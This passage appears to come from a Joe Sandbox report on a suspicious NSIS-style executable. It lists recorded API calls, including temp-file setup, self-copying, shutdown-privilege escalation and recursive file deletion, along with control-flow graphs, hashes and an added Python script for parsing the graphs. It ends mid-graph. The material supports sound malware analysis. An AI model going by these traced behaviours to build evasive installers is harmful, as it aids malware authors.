• CharNextW.USER32(00000000,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000020,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000), ref: 004036A0
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
• DeleteFileW.KERNELBASE(1033), ref: 00403839
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 00403920
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 0040392F
  • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 0040393A
                                                                                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 00403946
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                                                                                                                                            • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\fGu8xWoMrg.exe,00420EC8,00000001), ref: 004039D8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403AD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
• String ID: "C:\Users\user\Desktop\fGu8xWoMrg.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\Desktop$C:\Users\user\Desktop\fGu8xWoMrg.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 3859024572-3954714193
• Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
• Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
• Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
• Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405706
• GetDlgItem.USER32(?,000003EE), ref: 00405715
• GetClientRect.USER32(?,?), ref: 00405752
• GetSystemMetrics.USER32(00000002), ref: 00405759
• SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
• ShowWindow.USER32(?,00000008), ref: 004057F5
• GetDlgItem.USER32(?,000003EC), ref: 00405816
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
• GetDlgItem.USER32(?,000003F8), ref: 00405724
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• GetDlgItem.USER32(?,000003EC), ref: 00405868
• CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
• CloseHandle.KERNELBASE(00000000), ref: 0040587D
• ShowWindow.USER32(00000000), ref: 004058A1
• ShowWindow.USER32(?,00000008), ref: 004058A6
• ShowWindow.USER32(00000008), ref: 004058F0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
• CreatePopupMenu.USER32 ref: 00405935
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
• GetWindowRect.USER32(?,?), ref: 00405969
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
• OpenClipboard.USER32(00000000), ref: 004059CA
• EmptyClipboard.USER32 ref: 004059D0
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
• GlobalLock.KERNEL32(00000000), ref: 004059E6
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
• GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
• CloseClipboard.USER32 ref: 00405A2B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
• Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
• Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Control-flow Graph
APIs
• DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
• lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
• lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
• lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
• FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
• FindClose.KERNEL32(00000000), ref: 00405D6C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                            • API String ID: 2035342205-1049245928
                                                                                                                                                                            • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                                                                                                                                            • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
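Added example, not part of the Joe Sandbox report and not Joe Sandbox's code: a Python parser for the flat control_flow_graph token stream and the "APIs" list of this entry, both copied verbatim as its constructed input. The token grammar it assumes (the first listed block is the function entry; "<id> <addr>[-<addr>]" declares a basic block; "<a>-><b>" is an edge; "call <addr>" is a direct call; "* N" repeats the previous call or API N times) is inferred from the text of this report, not taken from a documented export format. The script computes dominators, loop back edges and natural loop bodies, flags blocks that call the function's own entry address, and maps each API "ref" address to the block whose range contains it. For this function it reports a single loop closed by 534->526 whose body holds FindNextFileW and the recursive call in block 545, so the routine is a FindFirstFileW/FindNextFileW enumeration over the "\*.*" pattern built by lstrcatW that re-enters itself from inside the loop, while DeleteFileW sits in block 504 on the path 500->504->505 that returns without entering the enumeration at all.

```python
# Added example, not Joe Sandbox code: parse one function entry of a Joe Sandbox report (the flat
# control_flow_graph token stream plus its "APIs" list) and recover its loop and recursion structure.
import re
from types import SimpleNamespace

# Constructed inputs, copied from the report entry for the function at 00405C13.
CFG_TEXT = """control_flow_graph 500 405c13-405c39 call 405ede 503 405c52-405c59 500->503 504 405c3b-405c4d DeleteFileW 500->504 506 405c5b-405c5d 503->506
507 405c6c-405c7c call 406507 503->507 505 405dcf-405dd3 504->505 508 405c63-405c66 506->508 509 405d7d-405d82 506->509 513 405c8b-405c8c call 405e22 507->513
514 405c7e-405c89 lstrcatW 507->514 508->507 508->509 509->505 512 405d84-405d87 509->512 515 405d91-405d99 call 40683d 512->515 516 405d89-405d8f 512->516
517 405c91-405c95 513->517 514->517 515->505 524 405d9b-405daf call 405dd6 call 405bcb 515->524 516->505 520 405ca1-405ca7 lstrcatW 517->520 521 405c97-405c9f 517->521
523 405cac-405cc8 lstrlenW FindFirstFileW 520->523 521->520 521->523 525 405d72-405d76 523->525 526 405cce-405cd6 523->526 540 405db1-405db4 524->540
541 405dc7-405dca call 405569 524->541 525->509 528 405d78 525->528 529 405cf6-405d0a call 406507 526->529 530 405cd8-405ce0 526->530 528->509
542 405d21-405d2c call 405bcb 529->542 543 405d0c-405d14 529->543 533 405ce2-405cea 530->533 534 405d55-405d65 FindNextFileW 530->534 533->529
539 405cec-405cf4 533->539 534->526 538 405d6b-405d6c FindClose 534->538 538->525 539->529 539->534 540->516 544 405db6-405dc5 call 405569 call 4062c7 540->544
541->505 553 405d4d-405d50 call 405569 542->553 554 405d2e-405d31 542->554 543->534 545 405d16-405d1f call 405c13 543->545 544->505 545->534 553->534
557 405d33-405d43 call 405569 call 4062c7 554->557 558 405d45-405d4b 554->558 557->534 558->534"""
API_LINES = r"""• DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
• lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
• lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
• lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
• FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
• FindClose.KERNEL32(00000000), ref: 00405D6C"""

ADDR = re.compile(r"^([0-9a-f]{6,8})(?:-([0-9a-f]{6,8}))?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
NAME = re.compile(r"^(?!call$)[A-Za-z]\w+$")  # bare API names annotated on a block, e.g. lstrcatW

def parse_cfg(text):
    """Assumed grammar: first block = entry; "<id> <addr>[-<addr>]" block; "<a>-><b>" edge;
    "call <addr>" direct call; "* N" the previous call/API occurs N times."""
    toks = text.split()
    toks = toks[1:] if toks and toks[0] == "control_flow_graph" else toks
    blocks, edges, cur, last, i = {}, [], None, None, 0
    while i < len(toks):
        t, nxt = toks[i], toks[i + 1] if i + 1 < len(toks) else ""
        e, a = EDGE.match(t), ADDR.match(nxt)
        if e:
            edges.append((int(e.group(1)), int(e.group(2))))
        elif t == "call" and cur and a and not a.group(2):
            cur.calls.append(int(nxt, 16)); last = (cur.calls, cur.calls[-1]); i += 1
        elif t == "*" and nxt.isdigit() and last:
            last[0].extend([last[1]] * (int(nxt) - 1)); i += 1
        elif t.isdigit() and a:
            lo, hi = int(a.group(1), 16), int(a.group(2) or a.group(1), 16)
            cur = blocks[int(t)] = SimpleNamespace(bid=int(t), start=lo, end=hi, calls=[], apis=[]); i += 1
        elif cur and NAME.match(t):
            cur.apis.append(t); last = (cur.apis, t)
        i += 1
    return SimpleNamespace(entry=next(iter(blocks)), blocks=blocks, edges=edges)

def adjacency(cfg):
    succ, pred = {b: [] for b in cfg.blocks}, {b: [] for b in cfg.blocks}
    for u, v in cfg.edges:
        succ.setdefault(u, []).append(v); pred.setdefault(v, []).append(u)
    return succ, pred

def dominators(cfg):  # dominator sets over the blocks reachable from the entry (iterative fixpoint)
    succ, pred = adjacency(cfg)
    reach, work = set(), [cfg.entry]
    while work:
        n = work.pop()
        if n not in reach: reach.add(n); work.extend(succ.get(n, []))
    dom = {n: set(reach) for n in reach}; dom[cfg.entry] = {cfg.entry}; changed = True
    while changed:
        changed = False
        for n in reach - {cfg.entry}:
            new = {n} | set.intersection(*(dom[p] for p in pred.get(n, []) if p in reach))
            if new != dom[n]: dom[n], changed = new, True
    return dom

def back_edges(cfg):  # u->v with v dominating u: each one closes a loop whose header is v
    dom = dominators(cfg)
    return sorted((u, v) for u, v in cfg.edges if u in dom and v in dom[u])

def natural_loop(cfg, tail, head):  # head plus every block that reaches tail without passing head
    pred, body, work = adjacency(cfg)[1], {head, tail}, [tail]
    while work:
        for p in pred.get(work.pop(), []):
            if p not in body: body.add(p); work.append(p)
    return body

def recursive_blocks(cfg):  # blocks holding a direct call to the function's own entry address
    return [b.bid for b in cfg.blocks.values() if cfg.blocks[cfg.entry].start in b.calls]

def block_for(cfg, addr):  # block whose range contains the per-call 'ref' address the sandbox records
    return next((b.bid for b in cfg.blocks.values() if b.start <= addr <= b.end), None)

API_LINE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def parse_api_lines(text):  # "• Api.Module(args), ref: ADDR" lines -> dicts (args split naively on ',')
    return [{"api": m.group(1), "module": m.group(2), "ref": int(m.group(4), 16),
             "args": m.group(3).split(",") if m.group(3) else []}
            for m in map(API_LINE.match, text.splitlines()) if m]

def summarize(cfg, api_text):
    bes = back_edges(cfg)
    loop = set().union(*(natural_loop(cfg, t, h) for t, h in bes))
    rec = recursive_blocks(cfg)
    api_blocks = {}
    for r in parse_api_lines(api_text):
        api_blocks.setdefault(r["api"], []).append(block_for(cfg, r["ref"]))
    return {"blocks": len(cfg.blocks), "edges": len(cfg.edges), "back_edges": bes, "loop_blocks": sorted(loop),
            "recursive_blocks": rec, "recursion_inside_loop": any(b in loop for b in rec), "api_blocks": api_blocks,
            "apis_in_loop": sorted({a for b in loop for a in cfg.blocks[b].apis}),
            "calls_in_loop": sorted({c for b in loop for c in cfg.blocks[b].calls})}

if __name__ == "__main__":
    for k, v in summarize(parse_cfg(CFG_TEXT), API_LINES).items():
        print(f"{k:22} {v}")
```

Back edges are taken from dominators rather than from DFS retreating edges because the DFS result depends on traversal order for irreducible graphs, which hand-written or obfuscated code can produce. The argument splitter breaks on commas, so an argument string that itself contained a comma would be misparsed; none of the arguments recorded for this function do.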

Control-flow Graph
control_flow_graph 727 406bfe-406c03 728 406c74-406c92 727->728 729 406c05-406c34 727->729 732 40726a-40727f 728->732 730 406c36-406c39 729->730 731 406c3b-406c3f 729->731 733 406c4b-406c4e 730->733 734 406c41-406c45 731->734 735 406c47 731->735 736 407281-407297 732->736 737 407299-4072af 732->737 738 406c50-406c59 733->738 739 406c6c-406c6f 733->739 740 4072b2-4072b9 736->740 737->740 743 406c5b 738->743 744 406c5e-406c6a 738->744 745 406e41-406e5f 739->745 741 4072e0-4072ec 740->741 742 4072bb-4072bf 740->742 755 406a82-406a8b 741->755 746 4072c5-4072dd 742->746 747 40746e-407478 742->747 743->744 751 406cd4-406d02 744->751 749 406e61-406e75 745->749 750 406e77-406e89 745->750 746->741 752 407484-407497 747->752 756 406e8c-406e96 749->756 750->756 753 406d04-406d1c 751->753 754 406d1e-406d38 751->754 758 40749c-4074a0 752->758 757 406d3b-406d45 753->757 754->757 761 406a91 755->761 762 407499 755->762 759 406e98 756->759 760 406e39-406e3f 756->760 764 406d4b 757->764 765 406cbc-406cc2 757->765 766 406e14-406e18 759->766 767 406fa9-406fb6 759->767 760->745 763 406ddd-406de7 760->763 768 406a98-406a9c 761->768 769 406bd8-406bf9 761->769 770 406b3d-406b41 761->770 771 406bad-406bb1 761->771 762->758 772 40742c-407436 763->772 773 406ded-406e0f 763->773 789 406ca1-406cb9 764->789 790 407408-407412 764->790 774 406d75-406d7b 765->774 775 406cc8-406cce 765->775 778 407420-40742a 766->778 779 406e1e-406e36 766->779 767->755 768->752 783 406aa2-406aaf 768->783 769->732 781 406b47-406b60 770->781 782 4073ed-4073f7 770->782 776 406bb7-406bcb 771->776 777 4073fc-407406 771->777 772->752 773->767 785 406dd9 774->785 787 406d7d-406d9b 774->787 775->751 775->785 786 406bce-406bd6 776->786 777->752 778->752 779->760 788 406b63-406b67 781->788 782->752 783->762 784 406ab5-406afb 783->784 791 406b23-406b25 784->791 792 406afd-406b01 784->792 785->763 786->769 786->771 793 406db3-406dc5 787->793 794 406d9d-406db1 787->794 788->770 795 406b69-406b6f 788->795 789->765 790->752 798 406b33-406b3b 791->798 799 406b27-406b31 791->799 796 406b03-406b06 GlobalFree 792->796 797 406b0c-406b1a GlobalAlloc 792->797 800 406dc8-406dd2 793->800 794->800 801 406b71-406b78 795->801 802 406b99-406bab 795->802 796->797 797->762 803 406b20 797->803 798->788 799->798 799->799 800->774 806 406dd4 800->806 804 406b83-406b93 GlobalAlloc 801->804 805 406b7a-406b7d GlobalFree 801->805 802->786 803->791 804->762 804->802 805->804 808 407414-40741e 806->808 809 406d5a-406d72 806->809 808->752 809->774
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(75923420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID: XgB
                                                                                                                                                                            • API String ID: 2295610775-796949446
                                                                                                                                                                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Control-flow Graph
control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 199 403f88-403f91 195->199 197 40413b-404150 196->197 198 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 196->198 201 404190-404195 call 4044af 197->201 202 404152-404155 197->202 198->197 203 403f93-403fa0 SetWindowPos 199->203 204 403fa6-403fad 199->204 218 40419a-4041b5 201->218 206 404157-404162 call 401389 202->206 207 404188-40418a 202->207 203->204 209 403ff1-403ff7 204->209 210 403faf-403fc9 ShowWindow 204->210 206->207 234 404164-404183 SendMessageW 206->234 207->201 217 404430 207->217 214 404010-404013 209->214 215 403ff9-40400b DestroyWindow 209->215 211 4040ca-4040d8 call 4044ca 210->211 212 403fcf-403fe2 GetWindowLongW 210->212 222 404432-404439 211->222 212->211 219 403fe8-403feb ShowWindow 212->219 223 404015-404021 SetWindowLongW 214->223 224 404026-40402c 214->224 221 40440d-404413 215->221 217->222 227 4041b7-4041b9 call 40140b 218->227 228 4041be-4041c4 218->228 219->209 221->217 230 404415-40441b 221->230 223->222 224->211 233 404032-404041 GetDlgItem 224->233 227->228 231 4041ca-4041d5 228->231 232 4043ee-404407 DestroyWindow EndDialog 228->232 230->217 236 40441d-404426 ShowWindow 230->236 231->232 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 231->237 232->221 238 404060-404063 233->238 239 404043-40405a SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 241 404065-404066 238->241 242 404068-40406b 238->242 239->217 239->238 244 404096-40409b call 40443c 241->244 245 404079-40407e 242->245 246 40406d-404073 242->246 244->211 249 4040b4-4040c4 SendMessageW 245->249 251 404080-404086 245->251 246->249 250 404075-404077 246->250 249->211 250->244 252 404088-40408e call 40140b 251->252 253 40409d-4040a6 call 40140b 251->253 262 404094 252->262 253->211 263 4040a8-4040b2 253->263 262->244 263->262 270 404270-404271 266->270 271 404273 